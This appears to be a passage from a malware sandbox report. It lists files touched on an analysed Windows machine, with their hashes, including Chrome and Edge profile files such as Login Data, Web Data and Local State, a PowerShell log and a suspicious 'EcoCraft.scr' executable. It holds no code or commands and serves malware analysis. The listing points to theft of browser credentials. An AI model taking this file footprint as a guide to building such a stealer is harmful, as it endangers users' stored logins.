                                                                                                                                                                                  659ba2f889d471a0733cad810e466250a94455095e5600ccbf1ddf5234f32596

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e25fd8582d9adabd191d084a617a358fb0497dd81b65bfa0cf9f27f7244eb5f07303bf2da65a3b1b2c5f7b425ac324f93b66f9e124a021985c0c8047791b1195

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  456B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b817b7a56b56b52851f5b4630aa46de3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  154b8947c1532d2613fd925cf080386670385533

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ca856795e589fd5fcd70168a9ae52671b283503ebc8f2c2a70bc1ae07faff4e6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8de202741aa527fa1e5dda0400e612eec96529a1988c16197824bf2bda9ce4393cd1710d5521f9f7790daf87fea352c007720b4fbb6937379148acde33345930

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  504B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5e52e34e38c28d1e07370b19ffa25658

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1b0c4da510939fe809a9316a9b242aef01268224

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  91e70cf1329b70e11dcf828607dd98d251cfae03fbd2d342ddacdf82f41b1cd3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  31cbb028988b78c0f74be0a81fcc6cd41540d2c6b92930a7c0cc9508ea2a74ffd93f59f82a75a91c908037df8678ab5e18783dd175dcee75eec070e7e91dd455

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c7240cdf29f9628e5d308d0b455afd54

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cc8713cdc54f9bc3687b71ee8cc763b19f8da720

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7bd5c6407b196e50596a7a1c7ea34f9393841691cdd22a81a32ac11a96b46dd4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cd9fe173e441711659f94d6a35f0fc20865157f12c8f1b2824dce692a538d4c5ead2f66e2d475694d88e02a0e19e4058306081724ec593b5e86ad5a59a0de3d9

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  160KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7c07a7b2a4290a0a6d00e129ccf211cd

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  52d5ea2c4b9271a60ef0882f3ee0483a61ec1a54

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  37f9fe77a47cba3bada58c62c829e7746a9c7c846bfa5fe79db97d60988ac388

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a23f366e60807789122f018d12e2ef4c5df1ac04ec00036926d5a83e8ff1fe85e93f998a31291ebfb0cbcfd77f714beb6026a7f0348e34c1cd6d849a70fc6229

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  394552fd4458a59b86bf606b352c8d05

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e91ccd6215d2808d4c31ab88ec130eb959f71646

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1f4ad5030e63b55ebe1935c3e86654c70dfc4460b705e808c6ba2e8fc44275d6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ce2ab245ff2287770531c99e01c434af671d031697b7f50e44ededb06bfb46715e4474678266875565dacf8998c5225411f10893159daa12267b6879b39639d6

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f5dfc8c160ea631e186e8ebca23a82a3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4be8db1b9a289f107e5ffeb065d9bbe30848014f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  097878a295daec7b06dd239b5c18f52f7f08b892cf0f98833bc27d8def45de7b

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  77358a97be46107410a859250c5061ec7d437777e8288ba665e5e308938b39216bca45b30099221ee0746cca5e37b6c6fb2cf66742767fb99c84a257f0849c4c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5e74e44947234894b1689cd647a5d051

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5d3b12b153a8fc5c821b52b1d5176dcba280b65c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7ccae71df096bcee5fb9021b742f774f46c46a82d33ebef5a7f5d69c78f1d292

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f871b0d9e451328514d4b982672e34a174f3098e8bdced5766d0b165929a38af8517aec46d67251a92fd472046517caaaebadd76cccb0445db39a597d829d501

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d751713988987e9331980363e24189ce

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  523B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c4396903f6e41a294c40d021e7980c59

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b90fddd17132dfa3861e2aa7d083c9791e367e43

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  98d4f796e6af71161c7e760807f1d1ea364d8f24d8326b0890b8fdebc5495f51

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  50b54ffd6fa63697c203994e91d1cbadca86ebb9b958293ce110efddb00e0dcfca44fb681d4e0935518cb099e05bf64e1dfb48ffbbe009036b1576a276a1cd68

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  523B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b098a2c988410a5f526518f72d834e05

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  735c13f34e046c4c73429d68cc4b066737b79b25

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  85cb0c42889225a67169a8df5df9dd38d2f4afaceb3f7aa3746fb25c0f5cc659

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b071911cac2092ec16e74fffc1a26e563356620c72cc59b8213e7f3d2fff09b2beee6e6379722303d50389d3f46de292911777a0c974352050b7ffce2eb5391d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  523B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  db6f27f777c9a0caeeeaff4187fe0f70

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4fcc970f37b88d0c8bb1e6f46aabf7006f2f4515

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  33871f179d2f4f959d6877d263ab6eb7fa635e3f86b54fc5e753568b17a71ba1

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2fc243aa3126adc0ccc0f563b6e3349f8589c1b76bc2065bb6d133e4ea3885bbdd9fd4c330ddf340a43ca6089777517acd8c7768b1ba27f21b4bd02fad95eb75

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\aef1b05b-67e9-4446-83ad-cbf0e9f895cc.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  523B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  cc20b3479cf4858974d80351fa3b998c

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f89800e9994228b6481426d68a6ea4f0509c239f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ccbfdda334f9d07224ecb517db036e42624c1138f3e1cfb28cb76f338f05bf42

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  afb0db6b62f168f3dd2f8d8e08f36d96230fef04d6fef62d3df9b8bafcdace6e9d6d0403df008d096fbc2a8c84658cb0ead84e00134c4812e81e12e21c5842de

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b89f7be260679cb70402f0488b6c983f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5037179999cce5635161e6bee128e6817d7567a9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0919724ead8077959edaf42bb5f5a2aa5e5474aa78294a7d19c3acf3f6dd4679

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  410c676429cddd8314ead732610027ef64331fc1f7a6e0529a719b69acf168fc388896f883ba182ec2af26f9846047f59e116d7518f540308a56f1a02f3c6430

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e403d0a47592ad9e1a93c1c64e5cae7e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e81a77a4f74ed2ba9e8245fa87aeab88a51396d3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4543b5270f272d7052d5f6315344bb843b3ea073fa7573b16c789b72f488258a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b1a9cf751cd9f752d7aeba69df57982bb14dbde756de89164f08e57f99683df5320f50c7309cd69c3a0daa0c6cbb5cecd278d9c24d22e92cc7a91b59000aa631

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5e07bede3e3f5a22ac0d6bcadf4784be

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  352c6ebaf7615ada5c735be215251475d0fb0cbf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e9d411c6c6f180dc00c3d573bc4f68e81c2cb76e34f47dd0d300ff7cdb2ea568

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  6ee50830adfe45f6f464d9c184d12ef036fc7472a9c22e2e4e3da865aed301b897c638a2dc60ce3494addf8750cb6a53c43ba8774f41220ace72a79eddc57dfe

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  9KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d35cd882189f9eb429288ae82c9cafc2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  346c9dfb2955c5489e7a62bf061f5a2787f22b4c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4e70f40ad2a93ca38698790eb3d3a3013c9ae0a06a9f34807dc256527d325f34

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4b016c911704a6effea96fdc17a7f2d376fb02916eb442bb958101d20d729f23ebbb8c1d8060f0048108c69fc75fcd34411148294248ef0203e0518e94f1ad0b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e5ab86ee0f730de77ff08df1790c9e05

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ded733dcbcf8ba4cc0d37a29e532ee7386f04bde

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  26fc1ea4aa25d08e48a881092eb1d0439ee428c60611e1342e7f96e95f85db55

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  deec27ec734785c17229f0b5397b591a08f08d2fe35562ed2e62d3fbe373baf537292ff0b1a363bd415be8e1d4c54219e47a37dddb60e9623f04f5515f456968

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  15KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2262455aea4ed223cebec046f570b6d5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d7a6dd0209586ca77383c069de98e053194de63c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  71462b7bc4b682fbe79186847ff170c749656879878936f4012c7b41ba84339e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5964609d3a8a2666a2e84e5516531da5f9958f6b6c7902de068b248fae386f7526af0c987a3e3a59e23541e91e45a1349b1a218219d75049f9efa065eea4e6fe

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  114KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  fc682843186a8896ce8edac08551d0df

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6a1e8bd77e3dfd0b59ddbbb83277add1281e66ff

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  23c004a47ad4d4c7e38ba3d34bd9d00debb8ea30dfb744b3895d02f8dcd0eb34

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fd6fb2607e3aa5dd15e69d86901646cead7b22c1e668eee38a0af1e9f6aca8393215384b28019ab83b996f5c5727a0df88da65db1a3b601cf894caa036ce5297

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  236KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c499503e61a0a1ec0b9a78ed2856f604

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0a410d149c1b7f183ef545bf2af01d11571f8b91

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e6ed90e71050609ac88ad9106cad19934dccd4b6a7dfef9f1a578b86923e44cd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ae208944c93eb32a8e1b09a8bb4a94fdadfbf0c89d805a1c009db0cb571422715afbffae5619af1b75980c95cf08bdb5e7d25488e4d9f8c64965dc60f272cc32

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  236KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7b781ae9151f14ba1acb034900e815d3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c80e9924a0ca8952d82bab19c5b3af9df14f079e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ce695a381688ae56e18a94c07ff9a3514c1a5f3479d418ef8b397d76f32ba400

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d6f2587fa166464e20c0d9e0f5e13180f130a25952072a0cad0c3b0d62b685c90c56762e174dceef405c5ef8c729a7e6017ab214b2306397b024f9fb8124eae1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  236KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  126869ef4daf98bf648b52ef713bfcb0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e0cd79da9618f65627be29ac568aebd2f5d80472

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1eff90677b70101173cedae31f2ac2b78dc3ba89463f5ef266035addbb7263d4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ba6c84d6ebbb676f5f234f88127b5aa8a659a05b235dfe8475cf9b3bd3cd705038995c7c86ca889e609b199c96535517a77bf724dee800d713db6612d6fc2474

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.scr

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  872KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  18ce19b57f43ce0a5af149c96aecc685

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  f811272c20ff6decbbd16ff364334427

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  cb31be66c972daa61d45920fa2fa824c1dfb194d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  730aff8c9e430a9f9e5e44f1c376e57f42fa5adc744824df2f69855009473592

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5c68bf3a41c3607cad5abe94f2bb3816f3e69426fa7d43bf7c9787c4e9ce6660b1843a2e505a22a93d7008b76fc564078513fe9ef47051e5b6fc344ab9d0a528

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  78bc0ec5146f28b496567487b9233baf

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4b1794d6cbe18501a7745d9559aa91d0cb2a19c1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f5e3afb09ca12cd22dd69c753ea12e85e9bf369df29e2b23e0149e16f946f109

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0561cbabde95e6b949f46deda7389fbe52c87bedeb520b88764f1020d42aa2c06adee63a7d416aad2b85dc332e6b6d2d045185c65ec8c2c60beac1f072ca184a

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  152B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a134f1844e0964bb17172c44ded4030f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  853de9d2c79d58138933a0b8cf76738e4b951d7e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  50f5a3aaba6fcbddddec498e157e3341f432998c698b96a4181f1c0239176589

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c124952f29503922dce11cf04c863966ac31f4445304c1412d584761f90f7964f3a150e32d95c1927442d4fa73549c67757a26d50a9995e14b96787df28f18b4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  16KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  100c891c521ec15744bd11d4c828c8a3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3c8cddcc4250eb946a8dbd8bfd544b79a28c3a24

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  030e00b1f0a1c5439aefb062e8215b11c5f0c40562f7dba5d3ba492bfe834996

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e11b3722f376d461480ca0ff99f5a42cc5e0608cd90f970e5de2cdc505a6d574be761287b38682a6f3833a394de7a054934f5a8e5988004d6b56871a35b7db8a

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  782888bba0d3c1cf21438078995259f9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  05b6fa530450c0f38a9d3fe117b16b5571026aa7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  795ff26192d1d46b8482bfe22828241a3d456fa7e32b9ee9b9f5c4a58a881890

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7a28b6e3cfa70dd211ddbf18f4c14cee9ccd0981fe38dbd2736ab840b8ec760ffc9fe714c78c0b830533028f311c1951d0852cfc41e011137fd73cbfda8302b3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  456B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e75d6d616912569ded2ec9861218452b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  bd72650779b30de9343366be6d194e9213e40bb6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4f3546845bd2a8b3257fa4f511d466ab0a2d9fdc068b74844c0ec29d7230e537

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c23c0bc9227df97bebcabf2c2a18a4e8d21ec2808d84ad6d01ea79f73044a2089509ccdbfedc33bfba15f834391b3d42624498c8ebfa14d3f464b040f4dcda54

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  408B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  caad7fe6b101fdacd0c1b6e9a9a6a177

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  261a8a6e4e10b85d35cef107414c5e58f9140ec2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8d956e2f6bdee48a00b93412db28f4539aa884125d0f1ebe6bc06270260a89a7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  a07a67c7206064eec14c3ee2c4ae40a1dd053cb9f25b528967a81f5515c30c4566ca8b88926e41acdff810fec4f1d37b4c4767e1689ccebaadcf74940d288c87

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  70KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e5e3377341056643b0494b6842c0b544

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  111B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  28f3f8dde38db815c03ce98912280291

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fb2122e5e31e16ecaeb80e2c858bc1c82d11c47c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  aab2ee9e7975259722bf7f818fbc5eb9b5dae07232acf53555801da4fd04629f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8f45209a0f7d955039a16b92519e382f80d67b841e5a6eb610c7138e953ca695a9a254326be71b6f51e7dd6d1ee8923cba263faac1eb67d02ad9f5978a429efb

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c5c736cafc819a8d6760ca8132ed5a39

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9ea787bc2d418ad97ed775f7c940c5e7b7c31c55

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b9439897fb97ac4448b8e429ad683a7853509ee327752e05866ea6e1ed0390f1

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3401f3a95c60054a0a5c92b785cbea0225574f406329cf1cea1683bad9db47ec9e5270b23629d39d0a133b6f35ac1981ca657438fedc4a3b4f4548ddaa2f1871

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  33f17802c7bfd5a4ed7ff3e7123dacce

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ee9efa0f6370f12eb705d3446d375a3ab7cd7a3c

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c59cc66188d0f5aaa2a6d27ce5cc75e068a72f7f5ec294eb34a89fff86c3a711

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  66736fef557a9a639ac5bd0b4fe0836ce4fd312cf991d4ce139f4a6b57eb5c3150587d6b3b4911144d85bbf72b346a76f2063656177a846c512bfe21498149ac

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  bcff131d3e587330898febfe8f0c5510

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  39296efacf3d17f5673f5ce2bdc134f0ff9d87fd

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4e18f0b2a5f7bf3cc1d125e8a82bd15140b03252ec9cacdb2ed227cbde02313d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  8a5ec7ba8b9919ec15609daefad84717cc1bfe759cee0afddc069893e4d072fc3293e861f56b8a57e0c68b30fd6fc42fd71391f611b08dde37e792d84f2c5079

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  b5f84ba96c1091d7955a1e9f370ff341

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a7d1dc4d33746258363ab11161c0f8c6035308c5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  38cb2bb7f580dffa8821aff8c3ad6110b565fa27cee9464c977f82fb5fffc564

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  aa4e66f218e9bbaa5e439d6989dfa2a7f0a9804b1fb7ee4b65b56bd8000db64a564aa375f0643b895db60bcb481f2ca943c11f68af5b6830bc8f85eb25c52d8b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d91b413c0a8d876d62008f9490157275

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0478668c0f41d2b5bfeab1527e9a53d62af743c4

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bcaf87d5e2b91f3939c54dd5cb6a1fe38cf1e3b5ff6c8dab485b226976f67bf0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  947024fa75e3e1d1fe31bf795571bcdcda08ed523474f7b49b016951ec23d8e40f46bb2bfd2b40f73a2a2b9bb9e64a435c0b1b7cb778984030470f9c9f09b506

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e7bb3f2632060a615fcb4815cc4ef239

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0ed0d17a4fc8c7084bc94f8e02670fbb98611c6b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  11b1cb1ff8a03fe5e0a704aad2d5ffd9708abe57e6658397c8039e45e8772b1d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d9c24de790831dee31ca20f5c2b0f50100f057143d1f5996aaed91e2db983bd73d4bfc25d91473bdaaeeeae224cff966865e84d82fdacdf1d1f8679f6386d893

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

